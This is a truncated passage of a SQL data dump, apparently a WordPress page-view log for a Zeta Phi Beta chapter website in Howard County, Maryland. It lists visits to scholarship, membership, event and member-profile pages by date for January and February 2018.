01-18',3,786),('/service/breakfastonthego/','2018-01-18',2,772),('/','2018-01-18',44,6),('/?wc-ajax=get_refreshed_fragments','2018-01-18',20,6),('/history/','2018-01-18',5,190),('/event/5th-annual-denim-pearlz-party/','2018-01-18',1,1249),('/membership/','2018-01-18',2,576),('/scholarship/','2018-01-18',3,797),('/scholarship/application/','2018-01-18',6,804),('/scholarship/lgzscholarshipreleaseform/','2018-01-18',1,1173),('/ts_teams/christy-lewis/','2018-01-18',1,818),('/download/constitution-by-laws/','2018-01-18',1,989),('/scholarship/recommendation/','2018-01-18',1,1170),('/','2018-01-19',52,6),('/membership/','2018-01-19',1,576),('/service/appa/','2018-01-19',3,781),('/?wc-ajax=get_refreshed_fragments','2018-01-19',17,6),('/history/','2018-01-19',1,190),('/event/5th-annual-denim-pearlz-party/','2018-01-19',5,1249),('/lgz-launches-new-college-preparation-workshops/','2018-01-19',2,1243),('/scholarship/application/','2018-01-19',2,804),('/scholarship/','2018-01-19',2,797),('/service/breakfastonthego/','2018-01-19',1,772),('/scholarship/recommendation/','2018-01-19',1,1170),('/?wc-ajax=get_refreshed_fragments','2018-01-20',15,6),('/','2018-01-20',71,6),('/event/5th-annual-denim-pearlz-party/','2018-01-20',3,1249),('/history/','2018-01-20',2,190),('/service/breakfastonthego/','2018-01-20',4,772),('/service/zen/','2018-01-20',2,786),('/lgz-launches-new-college-preparation-workshops/','2018-01-20',2,1243),('/service/','2018-01-20',1,247),('/service/youth/','2018-01-20',1,738),('/scholarship/recommendation/','2018-01-20',1,1170),('/event/breakfast-on-the-go/','2018-01-20',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-20',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-20',1,1258),('/scholarship/application/','2018-01-20',3,804),('/service/appa/','2018-01-20',1,781),('/scholarship','2018-01-20',1,797),('/event/a-pretty-polished-affair/','2018-01-20',2,485),('/scholarship/','2018-01-20',4,797),('/?p=956','2018-01-20',1,956),('/lgz-launches-new-college-preparation-workshops/feed/','2018-01-20',2,1243),('/?p=1243','2018-01-20',1,1243),('/ts_teams/nicholas-claud/','2018-01-20',1,1220),('/ts_teams/jelani-dula/','2018-01-20',1,1226),('/ts_teams/christopher-flowers/','2018-01-20',1,1224),('/ts_teams/journey-mcmillan/','2018-01-20',1,1222),('/ts_teams/oretta-timmons/','2018-01-20',1,1230),('/cause/march-of-dimes/','2018-01-20',6,1023),('/ts_teams/yasmine-allen/','2018-01-20',2,1228),('/scholarship/lgzscholarshipreleaseform/','2018-01-20',2,1173),('/cause/marchofdimes-2/','2018-01-20',2,90),('/ts_teams/josephine-gross/','2018-01-20',2,1232),('/cause/scholarship/','2018-01-20',1,59),('/scholarship/soror-conway1/','2018-01-20',1,1179),('/ts_teams/tracy-irvin/','2018-01-20',1,815),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-01-20',1,689),('/ts_teams/dawn-j-kemp/','2018-01-20',1,817),('/product/denim-pearls-tickets/','2018-01-20',1,531),('/ts_teams/crystal-whitaker/','2018-01-20',1,816),('/ts_teams/christy-lewis/','2018-01-20',1,818),('/ts_teams/tamara-curtis/','2018-01-20',1,821),('/ts_slider/567/','2018-01-20',1,567),('/download/aarc/','2018-01-20',1,991),('/ts_teams/tamika-r-daniels/','2018-01-20',1,814),('/ts_teams/cherice-daniel-2/','2018-01-20',1,825),('/ts_teams/shanee-satchell/','2018-01-20',1,820),('/ts_teams/lillet-williams-2/','2018-01-20',1,824),('/ts_teams/lillet-williams/','2018-01-20',1,823),('/ts_teams/jeaneathia-yerby-crowder/','2018-01-20',1,828),('/download/constitution-by-laws/','2018-01-20',1,989),('/ts_teams/kathy-ball/','2018-01-20',1,887),('/ts_teams/kalima-alawode/','2018-01-20',1,888),('/ts_teams/linda-brigmon/','2018-01-20',1,886),('/ts_teams/nathalia-drew/','2018-01-20',1,1084),('/ts_teams/constance-kinder/','2018-01-20',1,822),('/?up_auto_log=true','2018-01-20',1,6),('/?wc-ajax=get_refreshed_fragments','2018-01-21',18,6),('/','2018-01-21',46,6),('/scholarship/application/','2018-01-21',3,804),('/scholarship/','2018-01-21',7,797),('/scholarship','2018-01-21',4,797),('/scholarship/recommendation/','2018-01-21',2,1170),('/cause/march-of-dimes/','2018-01-21',2,1023),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-21',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-21',1,1258),('/service/appa','2018-01-21',1,781),('/service/appa/','2018-01-21',1,781),('/event/breakfast-on-the-go','2018-01-21',1,493),('/event/breakfast-on-the-go/','2018-01-21',1,493),('/service/youth/','2018-01-21',1,738),('/service/breakfastonthego/','2018-01-21',1,772),('/ts_teams/linda-price/','2018-01-21',1,867),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-21',2,956),('/service/zen/','2018-01-21',2,786),('/history/','2018-01-21',2,190),('/download/constitution-by-laws/','2018-01-22',1,989),('/','2018-01-22',60,6),('/scholarship','2018-01-22',2,797),('/scholarship/','2018-01-22',5,797),('/?wc-ajax=get_refreshed_fragments','2018-01-22',15,6),('/history/','2018-01-22',4,190),('/lgz-celebrates-35-years-service-howard-county-md','2018-01-22',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-22',1,1258),('/scholarship/recommendation','2018-01-22',1,1170),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-22',1,1258),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-22',2,956),('/scholarship/recommendation/','2018-01-22',2,1170),('/download/aarc/','2018-01-22',4,991),('/service/breakfastonthego/','2018-01-22',2,772),('/event/5th-annual-denim-pearlz-party/','2018-01-22',2,1249),('/service/appa/','2018-01-22',3,781),('/?up_auto_log=true','2018-01-22',1,6),('/service/','2018-01-22',1,247),('/service/zen/','2018-01-22',1,786),('/','2018-01-23',59,6),('/scholarship/','2018-01-23',6,797),('/?wc-ajax=get_refreshed_fragments','2018-01-23',24,6),('/scholarship/recommendation/','2018-01-23',2,1170),('/download/aarc/','2018-01-23',2,991),('/event/5th-annual-denim-pearlz-party/','2018-01-23',5,1249),('/scholarship/lgzscholarshipreleaseform/','2018-01-23',3,1173),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-23',1,1258),('/history/','2018-01-23',7,190),('/scholarship/application/','2018-01-23',6,804),('/scholarship','2018-01-23',1,797),('/ts_teams/dawn-j-kemp/','2018-01-23',1,817),('/service/appa/','2018-01-23',1,781),('/service/zen/','2018-01-23',2,786),('/','2018-01-24',106,6),('/history/','2018-01-24',3,190),('/?wc-ajax=get_refreshed_fragments','2018-01-24',9,6),('/event/5th-annual-denim-pearlz-party/','2018-01-24',2,1249),('/service/appa/','2018-01-24',1,781),('/index.php','2018-01-24',1,6),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2018-01-24',1,804),('/scholarship/','2018-01-25',5,797),('/?wc-ajax=get_refreshed_fragments','2018-01-25',9,6),('/ts_teams/tamika-r-daniels/','2018-01-25',1,814),('/','2018-01-25',53,6),('/membership/','2018-01-25',4,576),('/scholarship','2018-01-25',2,797),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-25',2,1258),('/service/appa/','2018-01-25',1,781),('/scholarship/recommendation/','2018-01-25',3,1170),('/lgz-celebrates-35-years-service-howard-county-md','2018-01-25',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-25',1,956),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-25',1,1258),('/scholarship/recommendation','2018-01-25',1,1170),('/event/5th-annual-denim-pearlz-party','2018-01-25',1,1249),('/event/5th-annual-denim-pearlz-party/','2018-01-25',2,1249),('/scholarship/application/','2018-01-25',1,804),('/','2018-01-26',49,6),('/membership/','2018-01-26',2,576),('/index.php','2018-01-26',1,6),('/scholarship/','2018-01-26',3,797),('/?wc-ajax=get_refreshed_fragments','2018-01-26',11,6),('/scholarship/application/','2018-01-26',3,804),('/history/','2018-01-26',2,190),('/event/5th-annual-denim-pearlz-party/','2018-01-26',1,1249),('/service/appa/','2018-01-26',2,781),('/scholarship/application/','2018-01-27',4,804),('/?wc-ajax=get_refreshed_fragments','2018-01-27',12,6),('/','2018-01-27',60,6),('/service/appa/','2018-01-27',5,781),('/event/5th-annual-denim-pearlz-party/','2018-01-27',1,1249),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-27',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-27',1,1258),('/service/appa','2018-01-27',1,781),('/event/breakfast-on-the-go','2018-01-27',1,493),('/event/breakfast-on-the-go/','2018-01-27',1,493),('/scholarship/','2018-01-27',2,797),('/','2018-01-28',43,6),('/service/appa/','2018-01-28',3,781),('/?wc-ajax=get_refreshed_fragments','2018-01-28',12,6),('/event/5th-annual-denim-pearlz-party/','2018-01-28',3,1249),('/scholarship/application/','2018-01-28',2,804),('/scholarship/','2018-01-28',3,797),('/scholarship/recommendation/','2018-01-28',4,1170),('/membership/','2018-01-28',4,576),('/history/','2018-01-28',3,190),('/service/youth/','2018-01-28',1,738),('/scholarship','2018-01-28',2,797),('/','2018-01-29',61,6),('/?wc-ajax=get_refreshed_fragments','2018-01-29',23,6),('/membership/','2018-01-29',3,576),('/service/appa/','2018-01-29',4,781),('/event/5th-annual-denim-pearlz-party/','2018-01-29',5,1249),('/scholarship/','2018-01-29',5,797),('/scholarship/application/','2018-01-29',3,804),('/scholarship/recommendation/','2018-01-29',3,1170),('/event/a-pretty-polished-affair/','2018-01-29',2,485),('/scholarship/application/?gf_token=e2f7099107544513ab3b43c548ea204e','2018-01-29',1,804),('/','2018-01-30',159,6),('/?wc-ajax=get_refreshed_fragments','2018-01-30',15,6),('/download/constitution-by-laws/','2018-01-30',1,989),('/scholarship/application/','2018-01-30',2,804),('/scholarship/recommendation/','2018-01-30',2,1170),('/service/appa/','2018-01-30',6,781),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-30',1,1258),('/service/breakfastonthego/','2018-01-30',1,772),('/history/','2018-01-30',4,190),('/scholarship/application/?gf_token=e2f7099107544513ab3b43c548ea204e','2018-01-30',1,804),('/ts_teams/gloria-sanders','2018-01-30',1,865),('/ts_teams/gloria-sanders/','2018-01-30',1,865),('/index.php?op=check','2018-01-30',1,6),('/?op=check','2018-01-30',1,6),('/','2018-01-31',232,6),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-01-31',2,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-01-31',2,1258),('/service/appa','2018-01-31',1,781),('/service/appa/','2018-01-31',6,781),('/event/5th-annual-denim-pearlz-party','2018-01-31',1,1249),('/event/5th-annual-denim-pearlz-party/','2018-01-31',2,1249),('/scholarship','2018-01-31',3,797),('/scholarship/','2018-01-31',5,797),('/scholarship/recommendation','2018-01-31',1,1170),('/scholarship/recommendation/','2018-01-31',1,1170),('/lgz-celebrates-35-years-service-howard-county-md','2018-01-31',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-01-31',1,956),('/ts_teams/patreece-carter/','2018-01-31',1,885),('/?wc-ajax=get_refreshed_fragments','2018-01-31',16,6),('/membership/','2018-01-31',7,576),('/scholarship/application/','2018-01-31',1,804),('/service/breakfastonthego/','2018-01-31',1,772),('/history/','2018-01-31',1,190),('/','2018-02-01',180,6),('/?wc-ajax=get_refreshed_fragments','2018-02-01',17,6),('/membership/','2018-02-01',5,576),('/service/appa/','2018-02-01',4,781),('/event/5th-annual-denim-pearlz-party/','2018-02-01',2,1249),('/scholarship/application/','2018-02-01',5,804),('/scholarship/recommendation/','2018-02-01',3,1170),('/scholarship/','2018-02-01',3,797),('/history/','2018-02-01',3,190),('/ts_teams/linda-price/','2018-02-01',1,867),('/ts_teams/lillet-williams-2/','2018-02-01',1,824),('/service/zen/','2018-02-01',1,786),('/','2018-02-02',255,6),('/?wc-ajax=get_refreshed_fragments','2018-02-02',17,6),('/scholarship/','2018-02-02',3,797),('/event/5th-annual-denim-pearlz-party/','2018-02-02',8,1249),('/service/zen/','2018-02-02',4,786),('/service/','2018-02-02',3,247),('/history/','2018-02-02',8,190),('/scholarship/application/','2018-02-02',2,804),('/scholarship/recommendation/','2018-02-02',1,1170),('/service/appa/','2018-02-02',1,781),('/service/breakfastonthego/','2018-02-02',1,772),('/service/youth/','2018-02-02',1,738),('/history','2018-02-02',3,190),('/membership/','2018-02-02',7,576),('/','2018-02-03',247,6),('/?wc-ajax=get_refreshed_fragments','2018-02-03',11,6),('/service/','2018-02-03',2,247),('/membership/','2018-02-03',4,576),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-03',2,1258),('/service/breakfastonthego/','2018-02-03',2,772),('/history/','2018-02-03',1,190),('/service/zen/','2018-02-03',1,786),('/scholarship/','2018-02-03',1,797),('/scholarship/application/','2018-02-03',1,804),('/scholarship/recommendation/','2018-02-03',1,1170),('/service/youth/','2018-02-03',1,738),('/service/appa/','2018-02-03',1,781),('/event/5th-annual-denim-pearlz-party/','2018-02-03',1,1249),('/event/breakfast-on-the-go/','2018-02-03',1,493),('/event/a-pretty-polished-affair/','2018-02-03',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-03',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-03',1,956),('/','2018-02-04',229,6),('/membership/','2018-02-04',1,576),('/?wc-ajax=get_refreshed_fragments','2018-02-04',16,6),('/event/5th-annual-denim-pearlz-party/','2018-02-04',24,1249),('/history/','2018-02-04',4,190),('/scholarship/','2018-02-04',2,797),('/scholarship/application/','2018-02-04',6,804),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-04',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-02-04',1,1243),('/scholarship/recommendation/','2018-02-04',1,1170),('/service/breakfastonthego/','2018-02-04',1,772),('/service/zen/','2018-02-04',1,786),('/ts_teams/oretta-timmons/','2018-02-04',1,1230),('/lgz-launches-new-college-preparation-workshops/feed/','2018-02-04',1,1243),('/ts_teams/jelani-dula/','2018-02-04',1,1226),('/event/a-pretty-polished-affair/','2018-02-04',1,485),('/service/appa/','2018-02-04',1,781),('/service/','2018-02-04',1,247),('/','2018-02-05',225,6),('/scholarship/recommendation/','2018-02-05',14,1170),('/event/5th-annual-denim-pearlz-party/','2018-02-05',3,1249),('/scholarship/recommendation','2018-02-05',1,1170),('/?wc-ajax=get_refreshed_fragments','2018-02-05',21,6),('/scholarship/','2018-02-05',12,797),('/scholarship/application/','2018-02-05',13,804),('/event/a-pretty-polished-affair/','2018-02-05',1,485),('/history/','2018-02-05',2,190),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-02-05',7,689),('/scholarship','2018-02-05',1,797),('/','2018-02-06',235,6),('/service/youth/','2018-02-06',2,738),('/service/appa/','2018-02-06',6,781),('/?wc-ajax=get_refreshed_fragments','2018-02-06',34,6),('/event/5th-annual-denim-pearlz-party/','2018-02-06',19,1249),('/scholarship/recommendation/','2018-02-06',4,1170),('/?up_auto_log=true','2018-02-06',1,6),('/lgz-launches-new-college-preparation-workshops/','2018-02-06',2,1243),('/scholarship/application/','2018-02-06',5,804),('/scholarship/','2018-02-06',18,797),('/membership/','2018-02-06',3,576),('/history/','2018-02-06',4,190),('/service/','2018-02-06',1,247),('/service/breakfastonthego/','2018-02-06',1,772),('/service/zen/','2018-02-06',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-06',1,1258),('/event/breakfast-on-the-go/','2018-02-06',1,493),('/event/a-pretty-polished-affair/','2018-02-06',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-06',1,956),('/scholarship/lgzscholarshipreleaseform/','2018-02-06',1,1173),('/','2018-02-07',303,6),('/membership/','2018-02-07',3,576),('/service/appa/','2018-02-07',5,781),('/?wc-ajax=get_refreshed_fragments','2018-02-07',16,6),('/scholarship/','2018-02-07',3,797),('/event/5th-annual-denim-pearlz-party/','2018-02-07',3,1249),('/scholarship/application/','2018-02-07',4,804),('/history/','2018-02-07',1,190),('/event/breakfast-on-the-go/','2018-02-07',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-07',1,956),('/scholarship','2018-02-07',1,797),('/scholarship/recommendation/','2018-02-07',2,1170),('/membership/','2018-02-08',3,576),('/','2018-02-08',277,6),('/event/5th-annual-denim-pearlz-party/','2018-02-08',4,1249),('/?wc-ajax=get_refreshed_fragments','2018-02-08',21,6),('/history/','2018-02-08',2,190),('/service/appa/','2018-02-08',6,781),('/scholarship/','2018-02-08',2,797),('/scholarship/application/','2018-02-08',2,804),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-08',1,1258),('/lgz-launches-new-college-preparation-workshops/','2018-02-08',1,1243),('/service/','2018-02-08',2,247),('/ts_teams/dawn-j-kemp/','2018-02-08',1,817),('/scholarship/recommendation/','2018-02-08',1,1170),('/event/breakfast-on-the-go/','2018-02-08',1,493),('/ts_teams/tracy-irvin/','2018-02-08',1,815),('/','2018-02-09',337,6),('/scholarship/','2018-02-09',4,797),('/?wc-ajax=get_refreshed_fragments','2018-02-09',13,6),('/ts_teams/tamara-curtis/','2018-02-09',3,821),('/membership/','2018-02-09',1,576),('/event/a-pretty-polished-affair/','2018-02-09',3,485),('/service/','2018-02-09',1,247),('/index.php','2018-02-09',2,6),('/scholarship','2018-02-09',1,797),('/scholarship/application/','2018-02-09',5,804),('/scholarship/recommendation/','2018-02-09',1,1170),('/event/5th-annual-denim-pearlz-party/','2018-02-09',6,1249),('/history/','2018-02-09',2,190),('/','2018-02-10',381,6),('/?wc-ajax=get_refreshed_fragments','2018-02-10',12,6),('/event/5th-annual-denim-pearlz-party/','2018-02-10',1,1249),('/?up_auto_log=true','2018-02-10',1,6),('/scholarship/application/','2018-02-10',6,804),('/scholarship/recommendation/','2018-02-10',5,1170),('/scholarship/','2018-02-10',8,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-10',1,956),('/service/','2018-02-10',2,247),('/event/breakfast-on-the-go/','2018-02-10',1,493),('/service/appa/','2018-02-10',1,781),('/history/','2018-02-10',1,190),('/','2018-02-11',357,6),('/?wc-ajax=get_refreshed_fragments','2018-02-11',11,6),('/event/5th-annual-denim-pearlz-party/','2018-02-11',4,1249),('/scholarship/','2018-02-11',4,797),('/scholarship/application/','2018-02-11',4,804),('/event/breakfast-on-the-go/','2018-02-11',2,493),('/history/','2018-02-11',4,190),('/service/','2018-02-11',3,247),('/service/zen/','2018-02-11',1,786),('/service/appa/','2018-02-11',1,781),('/scholarship/recommendation/','2018-02-11',1,1170),('/service/breakfastonthego/','2018-02-11',1,772),('/service/youth/','2018-02-11',1,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-11',1,1258),('/event/a-pretty-polished-affair/','2018-02-11',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-11',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-11',1,956),('/','2018-02-12',384,6),('/?wc-ajax=get_refreshed_fragments','2018-02-12',13,6),('/history/','2018-02-12',1,190),('/scholarship/','2018-02-12',6,797),('/scholarship/application/','2018-02-12',6,804),('/scholarship/recommendation/','2018-02-12',5,1170),('/service/','2018-02-12',1,247),('/service/appa/','2018-02-12',1,781),('/service/breakfastonthego/','2018-02-12',1,772),('/service/youth/','2018-02-12',2,738),('/service/zen/','2018-02-12',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-12',1,1258),('/event/5th-annual-denim-pearlz-party/','2018-02-12',6,1249),('/event/breakfast-on-the-go/','2018-02-12',2,493),('/event/a-pretty-polished-affair/','2018-02-12',2,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-12',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-12',1,956),('/scholarship/soror-conway1/','2018-02-12',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-02-12',1,1173),('/ts_teams/josephine-gross/','2018-02-12',1,1232),('/ts_teams/oretta-timmons/','2018-02-12',1,1230),('/ts_teams/yasmine-allen/','2018-02-12',1,1228),('/ts_teams/jelani-dula/','2018-02-12',1,1226),('/ts_teams/christopher-flowers/','2018-02-12',1,1224),('/ts_teams/journey-mcmillan/','2018-02-12',1,1222),('/ts_teams/nicholas-claud/','2018-02-12',1,1220),('/membership/','2018-02-12',4,576),('/scholarship','2018-02-12',1,797),('/','2018-02-13',274,6),('/membership/','2018-02-13',4,576),('/scholarship','2018-02-13',1,797),('/scholarship/','2018-02-13',8,797),('/?wc-ajax=get_refreshed_fragments','2018-02-13',12,6),('/scholarship/application/','2018-02-13',6,804),('/history/','2018-02-13',4,190),('/service/appa/','2018-02-13',3,781),('/event/a-pretty-polished-affair/','2018-02-13',1,485),('/scholarship/recommendation/','2018-02-13',2,1170),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-02-13',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-13',1,1258),('/service/appa','2018-02-13',1,781),('/event/breakfast-on-the-go','2018-02-13',1,493),('/event/breakfast-on-the-go/','2018-02-13',1,493),('/event/5th-annual-denim-pearlz-party/','2018-02-13',1,1249),('/ts_teams/cassandra-dorsey/','2018-02-13',1,880),('/ts_teams/cherice-daniel-2/','2018-02-13',2,825),('/ts_teams/nathalia-drew/','2018-02-13',2,1084),('/ts_teams/shanee-satchell/','2018-02-13',2,820),('/membership/?//connect.facebook.net/en_US/sdk.js','2018-02-13',1,576),('/ts_teams/sandra-hudson/','2018-02-13',1,875),('/membership','2018-02-13',2,576),('/ts_teams/helen-newman/','2018-02-13',1,868),('/ts_teams/patreece-carter/?//connect.facebook.net/en_US/sdk.js','2018-02-13',1,885),('/ts_teams/kristin-clark/','2018-02-13',1,883),('/ts_teams/jeaneathia-yerby-crowder/','2018-02-13',1,828),('/event/a-pretty-polished-affair/?//connect.facebook.net/en_US/sdk.js','2018-02-13',1,485),('/ts_teams/rose-matthews/','2018-02-13',1,870),('/ts_teams/lillet-williams-2/','2018-02-13',3,824),('/ts_teams/constance-kinder/','2018-02-13',2,822),('/ts_teams/tamika-r-daniels/','2018-02-13',2,814),('/ts_teams/kathy-ball/','2018-02-13',2,887),('/ts_teams/jontue-sumler/','2018-02-13',1,862),('/ts_teams/tamara-curtis/','2018-02-13',1,821),('/cause/march-of-dimes/','2018-02-13',1,1023),('/service/zen/','2018-02-13',1,786),('/ts_teams/lillet-williams/','2018-02-13',1,823),('/ts_teams/crystal-whitaker/','2018-02-13',1,816),('/service/','2018-02-13',1,247),('/service/youth/','2018-02-13',1,738),('/service/breakfastonthego/','2018-02-13',1,772),('/ts_teams/gloria-sanders/','2018-02-13',1,865),('/','2018-02-14',336,6),('/ts_teams/crystal-whitaker/','2018-02-14',2,816),('/?wc-ajax=get_refreshed_fragments','2018-02-14',20,6),('/membership/','2018-02-14',4,576),('/index.php','2018-02-14',1,6),('/service/youth/','2018-02-14',2,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-02-14',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-14',2,1258),('/service/appa','2018-02-14',1,781),('/service/appa/','2018-02-14',3,781),('/event/breakfast-on-the-go','2018-02-14',1,493),('/event/breakfast-on-the-go/','2018-02-14',2,493),('/scholarship/','2018-02-14',4,797),('/history/','2018-02-14',2,190),('/scholarship/application/','2018-02-14',9,804),('/scholarship/recommendation/','2018-02-14',5,1170),('/service/','2018-02-14',4,247),('/service/breakfastonthego/','2018-02-14',1,772),('/service/zen/','2018-02-14',1,786),('/event/a-pretty-polished-affair/','2018-02-14',1,485),('/event/5th-annual-denim-pearlz-party/','2018-02-14',7,1249),('/lgz-launches-new-college-preparation-workshops/','2018-02-14',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-14',1,956),('/scholarship','2018-02-14',1,797),('/','2018-02-15',336,6),('/?wc-ajax=get_refreshed_fragments','2018-02-15',17,6),('/event/5th-annual-denim-pearlz-party/','2018-02-15',18,1249),('/scholarship/recommendation/','2018-02-15',3,1170),('/scholarship/application/','2018-02-15',7,804),('/service/appa/','2018-02-15',1,781),('/scholarship/','2018-02-15',4,797),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2018-02-15',2,804),('/service/youth/','2018-02-15',2,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-15',1,1258),('/','2018-02-16',325,6),('/scholarship/application/','2018-02-16',5,804),('/?wc-ajax=get_refreshed_fragments','2018-02-16',20,6),('/service/','2018-02-16',15,247),('/service','2018-02-16',3,247),('/scholarship/','2018-02-16',6,797),('/scholarship/recommendation/','2018-02-16',2,1170),('/service/breakfastonthego/','2018-02-16',1,772),('/event/5th-annual-denim-pearlz-party/','2018-02-16',2,1249),('/ts_teams/lillet-williams-2/','2018-02-16',3,824),('/service/appa/','2018-02-16',1,781),('/scholarship','2018-02-16',1,797),('/','2018-02-17',339,6),('/scholarship/application/','2018-02-17',5,804),('/scholarship/','2018-02-17',3,797),('/history/','2018-02-17',3,190),('/scholarship/recommendation/','2018-02-17',1,1170),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-17',2,1258),('/event/breakfast-on-the-go/','2018-02-17',1,493),('/service/appa/','2018-02-17',1,781),('/event/5th-annual-denim-pearlz-party/','2018-02-17',11,1249),('/service/zen/','2018-02-17',1,786),('/service/breakfastonthego/','2018-02-17',2,772),('/service/youth/','2018-02-17',1,738),('/event/a-pretty-polished-affair/','2018-02-17',4,485),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-17',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-02-17',1,1243),('/?wc-ajax=get_refreshed_fragments','2018-02-17',28,6),('/download/constitution-by-laws/','2018-02-17',1,989),('/service/','2018-02-17',1,247),('/','2018-02-18',344,6),('/scholarship/application/','2018-02-18',18,804),('/scholarship/application','2018-02-18',2,804),('/?wc-ajax=get_refreshed_fragments','2018-02-18',24,6),('/event/a-pretty-polished-affair/','2018-02-18',1,485),('/scholarship/','2018-02-18',8,797),('/scholarship/recommendation/','2018-02-18',5,1170),('/membership/','2018-02-18',6,576),('/event/5th-annual-denim-pearlz-party/','2018-02-18',2,1249),('/service/breakfastonthego/','2018-02-18',1,772),('/history/','2018-02-18',4,190),('/service/youth/','2018-02-18',2,738),('/service/','2018-02-18',1,247),('/','2018-02-19',352,6),('/scholarship/application/','2018-02-19',9,804),('/?wc-ajax=get_refreshed_fragments','2018-02-19',16,6),('/event/breakfast-on-the-go','2018-02-19',1,493),('/event/breakfast-on-the-go/','2018-02-19',2,493),('/lgz-celebrates-35-years-service-howard-county-md','2018-02-19',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-19',2,956),('/ts_teams/angela-jefferson/','2018-02-19',1,874),('/event/5th-annual-denim-pearlz-party/','2018-02-19',6,1249),('/membership/','2018-02-19',7,576),('/scholarship/','2018-02-19',8,797),('/history/','2018-02-19',1,190),('/service/zen/','2018-02-19',1,786),('/scholarship/recommendation/','2018-02-19',2,1170),('/service/','2018-02-19',3,247),('/service/youth/','2018-02-19',1,738),('/service/breakfastonthego/','2018-02-19',2,772),('/service/appa/','2018-02-19',1,781),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-02-19',1,1258),('/event/a-pretty-polished-affair/','2018-02-19',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-19',1,1243),('/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','2018-02-19',1,804),('/scholarship','2018-02-19',5,797),('/','2018-02-20',368,6),('/history/','2018-02-20',3,190),('/scholarship/','2018-02-20',15,797),('/membership/','2018-02-20',5,576),('/homepage/lgzpressrelease-2/','2018-02-20',1,682),('/?wc-ajax=get_refreshed_fragments','2018-02-20',21,6),('/scholarship/recommendation/','2018-02-20',3,1170),('/event/5th-annual-denim-pearlz-party/','2018-02-20',2,1249),('/scholarship/application/','2018-02-20',8,804),('/scholarship','2018-02-20',2,797),('/event/a-pretty-polished-affair/','2018-02-20',1,485),('/lgz-launches-new-college-preparation-workshops/','2018-02-20',2,1243),('/service/zen/','2018-02-20',1,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-20',2,956),('/ts_teams/shanee-satchell/','2018-02-20',1,820),('/','2018-02-21',335,6),('/membership/','2018-02-21',3,576),('/?wc-ajax=get_refreshed_fragments','2018-02-21',17,6),('/scholarship/recommendation/','2018-02-21',6,1170),('/scholarship/application/','2018-02-21',12,804),('/event/a-pretty-polished-affair/','2018-02-21',1,485),('/service/appa/','2018-02-21',1,781),('/service/breakfastonthego/','2018-02-21',1,772),('/service/youth/','2018-02-21',1,738),('/service/zen/','2018-02-21',1,786),('/history/','2018-02-21',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2018-02-21',1,956),('/scholarship/application/?gf_token=c8524ad4ac6b4875943d7477a3f22d43','2018-02-21',1,804),('/scholarship/','2018-02-21',5,797),('/scholarship/lgzscholarshipreleaseform/','2018-02-21',2,1173),('/scholarship/application/?gf_token=d2444ae118b047e5879f54c7d2478f82','2018-02-21',2,804),('/?wc-ajax=get_refreshed_fragments','2018-02-22',32,6),('/scholarship/application/','2018-02-22',7,804),('/scholarship/','2018-02-22',14,797),('/','2018-02-22',259,6),('/download/constitution-by-laws/','2018-02-22',1,989),('/history/','2018-02-22',4,190),('/scholarship/recommendation/','2018-02-22',2,1170),('/service/','2018-02-22',1,247),('/service/appa/','2018-02-22',1,781),('/service/breakfastonthego/','2018-02-22'